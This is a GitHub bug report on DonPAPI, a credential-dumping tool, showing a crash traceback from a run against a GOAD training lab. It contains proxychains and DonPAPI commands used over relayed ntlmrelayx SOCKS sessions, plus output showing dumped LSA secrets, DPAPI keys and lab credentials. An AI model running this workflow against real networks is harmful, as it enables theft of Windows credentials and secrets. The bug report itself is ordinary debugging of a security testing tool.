[bug] struct.error: ('unpack requires a buffer of 4 bytes', "When unpacking field 'CryptAlgo | <L=0 | b''[:4]'", 'When unpacking field \'Blob

DummyKitty commented 7 months ago

When I following the steps on GOAD, It turns out errors as follow:

└─$ proxychains -f /etc/proxychains_1080.conf DonPAPI -no-pass NORTH/EDDARD.STARK@192.168.56.22
[proxychains] config file found: /etc/proxychains_1080.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

         ,                                                                      
       ,                                                 LeHack Release! 💀                       
        (                                                                       
       .                                          by Touf & Zblurx @ Login Sécurité                       
                                &&&&&&                                                             
     &&&&&%%%.                  &&&&&&                                          
      &&&&%%%              &&&& &&&&&&       &&&&&&            &&&&&.           
      &&&&%%%           &&&&&&& &&&&&&    &&&&&&&&&&&&&     &&&&&&&&&&&         
      &&&&%%%         &&&&&&&&& &&&&&&  &&&&&&&&&&&&&&&&   &&&&&&&&&&&&&        
    &&&&&&%%%%%       &&&&&&    &&&&&&  &&&&&&    &&&&&&   &&&&&   &&&&&   #####  
 &&&&&&&&&%%%%%%%     &&&&&&&&&&&&&&&&  (&&&&&&&&&&&&&&&   &&&&&   &&&&&   # # #
 &/&/////////////%      &&&&&&&&&&&&      &&&&&&&&&&&&     &&&&&   &&&&&   #####
&&/&/#////////(//%         &&&&&&            &&&&&&        &&&&&   &&&&&    ###
&&/&/////////////%        
&&/&/////////////%        &&&&&&&&&        &&&&&&&&&&        &&&&&&&&&     &&&&&
&&/&//////////(//%     &&&&&&&&&&&&&&    &&&&&&&&&&&&&&   &&&&&&&&&&&&&&   &&&&&
&&/&/////////////%     &&&&&&   &&&&&&  &&&&&&   &&&&&&&  &&&&&&   &&&&&&  &&&&&
&&/&///////////(/%    &&&&&&    &&&&&&  &&&&&&    &&&&&& &&&&&&    &&&&&&  &&&&&
&&/&///(/////////%    &&&&&& &&&&&&&&&  &&&&&&&&& &&&&&& &&&&&& &&&&&&&&&  &&&&&
&&/&/////////////%    &&&&&& &&&&&&&      &&&&&&& &&&&&& &&&&&& &&&&&&&    &&&&&
&&#&###########/#%    &&&&&&                             &&&&&&                 
&&###############%    &&&&&&                             &&&&&&                

INFO Initializing database ./donpapi.db
INFO Loaded 1 targets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] CASTELBLACK (domain:north.sevenkingdoms.local) (Windows 10.0 Build 17763) [SMB Signing Disabled]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO host: \\192.168.56.98, user: eddard.stark, active:  2562, idle:     0
INFO Adding connected user eddard.stark from \\192.168.56.98
INFO host: \\192.168.56.98, user: robb.stark, active:  2616, idle:  2616
INFO Adding connected user robb.stark from \\192.168.56.98
INFO [192.168.56.22] [+] Found user .NET v2.0
INFO [192.168.56.22] [+] Found user .NET v2.0 Classic
INFO [192.168.56.22] [+] Found user .NET v4.5
INFO [192.168.56.22] [+] Found user .NET v4.5 Classic
INFO [192.168.56.22] [+] Found user Administrator
INFO [192.168.56.22] [+] Found user All Users
INFO [192.168.56.22] [+] Found user Classic .NET AppPool
INFO [192.168.56.22] [+] Found user Default
INFO [192.168.56.22] [+] Found user Default User
INFO [192.168.56.22] [+] Found user Public
INFO [192.168.56.22] [+] Found user robb.stark
INFO [192.168.56.22] [+] Found user sql_svc
INFO [192.168.56.22] [+] Found user vagrant
INFO [192.168.56.22] [+] Dumping LSA Secrets
INFO [192.168.56.22] [+] Dumping SAM Secrets
INFO [192.168.56.22] [+] SAM : Collected 6 hashes 
INFO [192.168.56.22] [+] Gathering DPAPI Secret blobs on the target
INFO [192.168.56.22] [+] Gathering Wifi Keys
INFO [192.168.56.22] [+] Gathering Vaults
INFO [192.168.56.22] [+] Gathering Certificates Secrets 
Traceback (most recent call last):
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/donpapi/lib/certificates.py", line 403, in loot_privatekeys
    masterkey_guid = self.get_masterkey_guid_for_privatekey(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/donpapi/lib/certificates.py", line 516, in get_masterkey_guid_for_privatekey
    blob=PVKFile(privatekey_bytes)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 382, in unpack
    return dataClassOrCode(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 87, in __init__
    self.fromString(data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 152, in fromString
    self[field[0]] = self.unpack(field[1], data[:size], dataClassOrCode = dataClassOrCode, field = field[0])
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 326, in unpack
    return self.unpack(two[0],data)
  File "/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/impacket/structure.py", line 385, in unpack
    return unpack(format, data)[0]
struct.error: ('unpack requires a buffer of 4 bytes', "When unpacking field 'CryptAlgo | <L=0 | b''[:4]'", 'When unpacking field \'Blob | : | b\'\\x01\\x00\\x00\\x00\\xfcP\\xc5F\\xdb\\xb69N\\x8dw\\xf3]\\xc2\\xb7\\xa4\\xc1\\x00\\x00\\x00\\x00,\\x00\\x00\\x00C\\x00r\\x00y\\x00p\\x00t\\x00o\\x00A\\x00P\\x00I\\x00 \\x00P\\x00r\\x00i\\x00v\\x00a\\x00t\\x00e\\x00 \\x00K\\x00e\\x00y\\x00\\x00\\x00\\x03f\\x00\\x00\\xc0\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\r\\xea?\\x8d\\x95@\\xfd\\x0c\\x82\\xf4\\x08\\tm\\x87\\xc5S\\x00\\x00\\x00\\x00\\x04\\x80\\x00\\x00\\xa0\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd6\\x1e\\xb5A6&\\xdb!\\xbet\\xe6\\xb8*\\x82\\xd0U@\\x05\\x00\\x00\\xee\\xfc(&\\x1e\\x1b\\x07\\xea\\xf6\\xa7\\xd1\\\\.*\\x15\\x7f\\x15\\xc3,)\\xcd\\xc0\\xa6>\\xd4\\x9d\\r\\x80\\xf2L\\xddt\\x80%\\xd9\\x9d\\x91XN\\xf3\\xaf~s\\x11z8C\\xb8VP,I\\xc0\\xba\\xf1\\x7f\\xab\\x18\\xe9\\x1cU\\xb1~Bj\\xae\\x18\\xf4\\xdd\\xa7\\x1dJ_\\xa6\\x0bs\\x8d\\xf1\\xd62\\x17s\\x14D\\xe1\\xd1mk\\x9fT\\\\#\\xcd\\x91\\xd7$\\xc3\\x9dD@dy\\xe9E\\xfbj\\xc76|n\\x95\\xf1\\x1f\\xbe\\xf8\\xbe\\x8f\\xddu\\xbe\\xc7\\xefV\\xe0\\xba\\x01\\xfb\\xce\\x16\\xb56\\x95<\\xf1\\xfb\\xf5r\\xef\\xd5\\x06\\x99\\xf5\\xd7_\\xc8\\xa3\\xeb\\xa5It+\\xf4\\x1cA.\\xf1?\\xe3\\xa0\\xa7\\x13\\x1d\\xc5\\xfe\\x8bs\\xd1\\xe1\\x83\\x14\\xf7\\xc48\\x85\\x94\\x07\\x93\\xec,\\x98-\\x0c,\\xe9\\x1a8\\x8e\\x9b\\x9ak\\x8f\\xe1\\xf9d\\x94%;\\xd8\\xa4\\xabS(\\xb6\\x1c}\\xbbq\\xd5\\xf7\\xe1E\\n\\xedn\\xb8\\x03\\xb5\\x8d\\x15\\x11\\x9a\\x8b\\xdc\\xf8\\x0c\\xb9J%\\xab_\\xf0\\r\\x01P\\x8a\\x1e\\xe9\\x11T\\xf42".0`\\xfeJ\\xe0\\x86\\x17\\x90\\x00\\xb3\\x1d\\xe6\\x04\\x08\\xfd\\xf2\\xd5\\xc7L\\xc2$\\xe7\\x84`<*\\xa1faq\\x1dC\\x13!9\\x96q\\x9e\\xfe\\xbf\\x021\\xa2\\xb9\\x97\\x90a\\xc2\\xb5\\x81D-\\xadyP\\x1c\\xc4\\x95E\\x8a\\x9a\\xc2\\xab9\\xf9\\x18x\\xe7\\x19E\\xc6JB\\x12\\xa7\\x82\\x0c\\x82g\\xdbw\\xe8\\x96\\xc8*\\x12T&\\x94z\\x14\\x96\\x0030\\xd1\\xd6\\x1a\\xcd\\x9e\\xae\\xb1\\xafzk\\x01\\xe0\\xce\\xfa\\xf0\\xc5\\xdd\\xd8a\\xec\\xb1b\\xc2\\xb9\\xcf\\xbe\\r\\xa2\\x0e\\xef\\xf0P\\xb8\\x8d\\x8dO\\xa6\\\'b\\x97\\xe0\\x11s\\x1bN\\xcd\\xe5\\nt\\xe3]\\xd0\\xfd%\\x8f\\xa9N\\xc9\\xcbj\\x8d\\xdc\\xb4\\xbf\\xd8\\xfbE28\\xdc*\\xea\\xdb\\xdc\\x07\\x8e\\xbczKY\\x0c&H\\x1d8\\xac\\xc1i\\x17\\x8b\\xef\\x9e\\xeb\\xce%\\xbct@]\\x90\\x8d\\x06\\x96\\xc1\\x1b\\x93\\n~\\x95\\\\\\x85iB\\x1a\\xf0[\\xd4\\xed\\\'\\xac27\\x14\\xcah\\xd5j\\xa1\\xd3\\xcc\\xebX\\xae\\xda\\r\\x11\\xa5~T\\x1b\\xef\\x0f5\\xca\\xf3\\xf4\\tc\\xa7\\xb6P\\xa0V\\xf7\\x0b\\xde\\xb2\\xe1\\xfd\\x8c\\xe0\\xea\\xe3}\\xb6\\xd3*/A6XY\\xae\\xb5\\xea\\x8a\\x8fr\\xd0\\xe9\\xf6\\xe4a\\xcf\\xfe\\xce\\xf7,\\xa1{5\\xb9\\x8d\\xc1@\\xcf\\xb6\\xc9\\xa0a_\\x8ewQ\\xb7\\x0b\\x99\\nn\\x85y/5\\x19\\xfaMk\\xaa\\xce\\xde\\x80\\xa6\\xad\\x81\\xb8\\x10F\\xd9\\xe1)\\xbd\\xea\\xd3&Q\\x8eR\\x8f\\x95\\x19Q6\\x97\\x80\\x8a\\xc9\\x82ev\\xdb\\xa70\\xc4\\xe6\\xb0\\xc3)}c\\x9e\\xa9\\xe6\\xf4\\xcd\\xc7w\\xeb\\x95,L8\\xe8\\x16\\x85\\xddT]\\xf9\\x14d#d\\x9c+\\\'p\\x93\\xf5~^\\xde\\xb1\\xb6\\xef\\xa1|\\\'\\xb6;\\x9fl\\xb3rj\\x8c\\xd0\\xb0Sj]b\\xb7z\\xcb-\\x1b\\xcb\\xdfX\\xf6;\\x80\\xb14\\xea\\x14\\x1a\\x8c\\xfc\\x1e;\\xf0\\x84\\xb2Y\\xd4\\xf2r\\xf7D\\x93u\\xd2[\\x98\\xd9\\xdcX\\xe7Q\\xba\\x14\\xfe\\xfe1\\xe8\\xf0\\xedi\\xc8\\x7f\\xbae\\xdc\\x12\\xc4\\xca6\\xc5k\\x88\\xd2\\xc7\\x93\\x9f\\\'T\\xabO(\\x8d\\x8f4M\\x1c\\xf2\\xb6T\\xab\\xe5\\xc3\\xe0\\x04BbA\\x0b\\x82\\xe0\\xa2\\xe6\\xbaG\\xa56|mB3\\xb0+\\x97ah\\x1a\\x05Q\\xae\\xca\\x93\\x13\\x7f\\xa0\\xc4\\xde\\x83\\xcc\\xadVT\\xf7c\\r\\x97b\\x01\\xe7h\\xd1M!\\xb8\\x89\\xc8\\x94S\\x05\\xfbR\\xe9\\x01\\xe8~L\\xf5w\\xe2\\x0e\\xa0@A\\xe0\\x95 \\x95\\xcc\\x03\\x99Rv\\xf2\\x0f\\t\\x1a\\xdc;}\\xa8Y!\\xe5l\\xbfN>\\xc9\\xd2\\xc5\\x1e&\\xec\\x94\\xc6\\x7f\\x94T\\xde\\x02\\x8e\\xfe9>\\xc2\\x95\\x9a\\xed\\xa8\\xfc|[`i\\xadH\\xe5I\\x03\\xaak\\x9a\\x9f`\\x0e\\xc1M#@C-\\x04\\xf5K\\xef\\xa2g\\xf9P\\xfa\\x95\\xfc\\xf7\\xa0mG\\n\\x8e\\xf3\\xe1\\x88\\xaeMp=\\x86\\x15\\x9fi>-\\xb8\\x11\\\\\\x8d\\xb6R\\xc7z[(<F\\xa4\\x9b\\x8df\\x9a \\xba\\xca@Dc=\\x06\\x9c9\\x95 \\x92\\xfc\\xdf\\x19\\x08H\\xa3\\x87\\xc4\\x81@m\\xc21S:\\x08\\xd6\\x84\\x98\\xd2\\xd8\\x01\\xd0\\x08g\\x84-\\x92\\xd4\\xb1\\x9b\\x1d~\\xf6\\xec\\x05H\\xbfT\\xe5J\\xf2\\xb9d\\x0b\\x03\\xe0\\xcd\\x8fU\\x1b\\x0f>\\x05\\xd6h\\xee\\x81\\xdes\\xac\\xc6\\x1aw\\xcaPN\\xe2@\\xc9\\x93\\x92\\xb2ex9\\x15\\xa0m\\xad\\xa2U)\\xd5g\\x8c\\xde\\x84\\xd4\\x86i%:8\\x7fZ\\xe2KM\\xfbc4\\xba\\xb2\\x08\\xe0DA6W!\\xc5\\x10\\x04\\xef\\xf7\\x90\\xf5\\xff\\x9e\\xcc3\\x81\\xc4\\x1e\\x02Gs\\xd77\\x86\\x0eu\\xf4\\x84\\xab\\x94\\xcb{[K\\x97\\x1eD;\\x95b\\xee\\xf5\\xa1DR]\\xc2\\xc4\\xdf\\xd6\\xca\\xee\\xb7\\xe8\\x02\\xd3\\x80\\xcf\\xb5~A>$Xf\\xa4s\\x10\\x8fi\\xd83\\x9b\\xd4A\\xdcH\\xcd\\x9a\\x1b\\x7f\\xe2V\\x94\\xba\\x99X"\\xc2E\\xfc\\xdf\\xc14\\xfc\\x1cS\\xad>\\x97\\xbb]ti\\x19\\xda.>\\xd6M\\x93\\x8f\\xc6\\x8a\\x0f\\n\\xf1\\xae^\\x16WrH\\xb6q\\x8b\\xcd\\x93o\\xeba%>\\xff\\xf4\\xd5\\xcf\\x16\\xbc\\xd1\\\'\\xe6\\x9d\\xddfn\\xa4\\x9fV^\\x05\\xb9Au"?\\x0c\\x94\\x98r\\xe3\\xc6\\xa2<Q\\xdf\\xb0Ok\\xe9A\\xb4b\\x0e\\x17\\xccV\\x8f\\x8b\\xac\\xa8.L\\xbb\\x95\\\\\\xa4\\x01Z\\xa9\\x85\\x14.\\xa2\\xd3Q5\\xb0\\x1fd[.\\xf8E\\xda\\xad\\x9fH\\x809;\\xe7/\\x1d\\x1dM\\x19U\\x877\\xba\\x18h\\xd4\\x10<m\\x80\\x92\\x9c\\xab@:\\xbf\\xb4\\x7f\\xd7l\\xb6*\\t<\\x93\\xc5J\\xe8a\\xe9h\\xf3\\xf0\\t\\xa29\\xb8U0)IGf[\\x9f\\xbb\\x87\\xdc\\xe8\\x90!=\\x86\\xcd\\x94\\xaf\\x06\\xce\\xb2\\x99\\x9a%=i\\x9c?\\xc6<9K\\x1b:\\xb5\\x96?\\xab/\\xb2\\xa1\\x94^\\x0c\\x14\\x89\\xad"\\xc3\\x8a\\x8d\\xd9#\\xac\\x14\\x00\\x00\\x00],\\xbf\\xe4z\\xd7\\xd3\\x13\\xb3=\\xce\\x18k\\x8e\\xc7\\xd3\\xa7\\xe0\\xdd4\\x01\\x00\\x00\\x00\\xd0\\x8c\\x9d\\xdf\\x01\\x15\\xd1\\x11\\x8cz\\x00\\xc0O\\xc2\\x97\\xeb\\x01\\x00\\x00\\x00\\xfcP\\xc5F\\xdb\\xb69N\\x8dw\\xf3]\\xc2\\xb7\\xa4\\xc1\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00E\\x00x\\x00p\\x00o\\x00r\\x00t\\x00 \\x00F\\x00l\\x00a\\x00g\\x00\\x00\\x00\\x03f\\x00\\x00\\xc0\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xac\\x98\\xc5;\\xd2\\xc0\\xc2M\\xfb\\xe1\\x93\\x8d\\x10Gq\\xd0\\x00\\x00\\x00\\x00\\x04\\x80\\x00\\x00\\xa0\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xff\\\\\\x17\\x1f\\xe2\\xf7\\xd5\\x1e\\xb8\\x95O\\x93\\xbe#o\\xe9\\x08\\x00\\x00\\x00q\\xd4\\x1e-\\x8aI\\x9c;\\x14\\x00\\x00\\x00\\xfc@\\x7f\\xadj&\\xc2\\xee\\xb8\\xac\\xc6\\x8dn\\x1a\\xd9=\\xc6\\x11Gh\'[:1524]\'')
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering Chrome Secrets 
INFO [192.168.56.22] [+] Gathering MSEdge Secrets 
INFO [192.168.56.22] [+] Gathering Mozilla Secrets 
INFO [192.168.56.22] [+] Gathering mRemoteNG Secrets 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering VNC Passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering Recent Files and Desktop Files 
/home/kali/.local/pipx/venvs/donpapi/lib/python3.9/site-packages/LnkParse3/target_factory.py:87: UserWarning: Unknown TargetID `195`
  warnings.warn(msg)

While ntlmrelayx is listening on 1080:

ntlmrelayx> socks
Protocol  Target         Username            AdminStatus  Port 
--------  -------------  ------------------  -----------  ----
SMB       192.168.56.23  NORTH/ROBB.STARK    FALSE        445  
SMB       192.168.56.23  NORTH/EDDARD.STARK  FALSE        445  
SMB       192.168.56.22  NORTH/ROBB.STARK    FALSE        445  
SMB       192.168.56.22  NORTH/EDDARD.STARK  TRUE         445

DummyKitty commented 7 months ago

But when I using version branch v1.0.2, everything is fine.

└─$ proxychains -f /etc/proxychains_1080.conf DonPAPI -no-pass NORTH/EDDARD.STARK@192.168.56.22 
[proxychains] config file found: /etc/proxychains_1080.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Impacket v0.11.0 - Copyright 2023 Fortra

INFO Initializing database ./seatbelt.db
INFO Loaded 1 targets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] CASTELBLACK (domain:north.sevenkingdoms.local) (Windows 10.0 Build 17763) [SMB Signing Disabled]
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO host: \\192.168.56.98, user: eddard.stark, active:  5214, idle:     0
INFO host: \\192.168.56.98, user: robb.stark, active:  5268, idle:  5268
INFO [192.168.56.22] [+] Found user .NET v2.0
INFO [192.168.56.22] [+] Found user .NET v2.0 Classic
INFO [192.168.56.22] [+] Found user .NET v4.5
INFO [192.168.56.22] [+] Found user .NET v4.5 Classic
INFO [192.168.56.22] [+] Found user Administrator
INFO [192.168.56.22] [+] Found user All Users
INFO [192.168.56.22] [+] Found user Classic .NET AppPool
INFO [192.168.56.22] [+] Found user Default
INFO [192.168.56.22] [+] Found user Default User
INFO [192.168.56.22] [+] Found user Public
INFO [192.168.56.22] [+] Found user robb.stark
INFO [192.168.56.22] [+] Found user sql_svc
INFO [192.168.56.22] [+] Found user vagrant
INFO [192.168.56.22]  [+] Dumping LSA Secrets
INFO [192.168.56.22] [+]  LSA :  vagrant : vagrant 
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x6787e5397633e7f7ff26175df0cf21d9c5b55cf5
INFO [192.168.56.22] [-] Found DPAPI User key : 0x15b4b03bef61c9df3de901a855fd9320085f9e28
INFO [192.168.56.22] [-] Found DPAPI Machine key : 0x68921a34ad1633847c43f119d7b9371145a58f4c
INFO [192.168.56.22] [-] Found DPAPI User key : 0xb4045e1ea262dfe8f7497c03d748f29175cd5a0d
INFO [192.168.56.22] [+]  LSA :  NL$KM_history : 10a01429cde3435824372b048f67cdf38a962f6edda9f4c33e4bcb66faf65f17dbe3878d42b4bfaf2a9b90b84d6cdd8e611395ebc860971850ea2f5fdf271f37                                                       
INFO [192.168.56.22]  [+] Dumping SAM Secrets
INFO [192.168.56.22] [+]  SAM : Collected 6 hashes 
INFO [192.168.56.22] [+] Gathering DPAPI Secret blobs on the target
INFO [192.168.56.22] [+]  
[CREDENTIAL]                                                                                                        
LastWritten : 2023-11-24 09:18:10                                                                                   
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)                                        
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)                                                                      
Type        : 0x1 (CRED_PERSIST_SESSION)                                                                            
Target      : WindowsLive:target=virtualapp/didlogical                                                              
Description : PersistedCredential                                                                                   
Unknown     :                                                                                                       
Username    : 02odnqztzydhtbsm                                                                                      
Unknown3     :                                                                                                      

INFO [192.168.56.22] [+]  
[CREDENTIAL]                                                                                                        
LastWritten : 2023-11-24 09:17:03                                                                                   
Flags       : 48 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)                                        
Persist     : 0x2 (CRED_PERSIST_LOCAL_MACHINE)                                                                      
Type        : 0x1 (CRED_PERSIST_SESSION)                                                                            
Target      : WindowsLive:target=virtualapp/didlogical                                                              
Description : PersistedCredential                                                                                   
Unknown     :                                                                                                       
Username    : 02kqimgougaimkhu                                                                                      
Unknown3     :                                                                                                      

INFO [192.168.56.22] [+] Gathering Wifi Keys
INFO [192.168.56.22] [+] Gathering Vaults
INFO [192.168.56.22] [+] Gathering Chrome Secrets 
INFO [192.168.56.22] [+] Gathering Mozilla Secrets 
INFO [192.168.56.22] [+] Gathering VNC Passwords
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.56.22:445  ...  OK
INFO [192.168.56.22] [+] Gathering mRemoteNG Secrets 
INFO [192.168.56.22] [+] Gathering Recent Files and Desktop Files 
/home/kali/.pyenv/versions/3.9.10/lib/python3.9/site-packages/LnkParse3-1.3.2-py3.9.egg/LnkParse3/target_factory.py:87: UserWarning: Unknown TargetID `195`
  warnings.warn(msg)
INFO [+] Generating report

zblurx commented 5 days ago

Should be fixed now. Feel free to reopen if this appends again

login-securite / DonPAPI

[bug] struct.error: ('unpack requires a buffer of 4 bytes', "When unpacking field 'CryptAlgo | <L=0 | b''[:4]'", 'When unpacking field \'Blob #66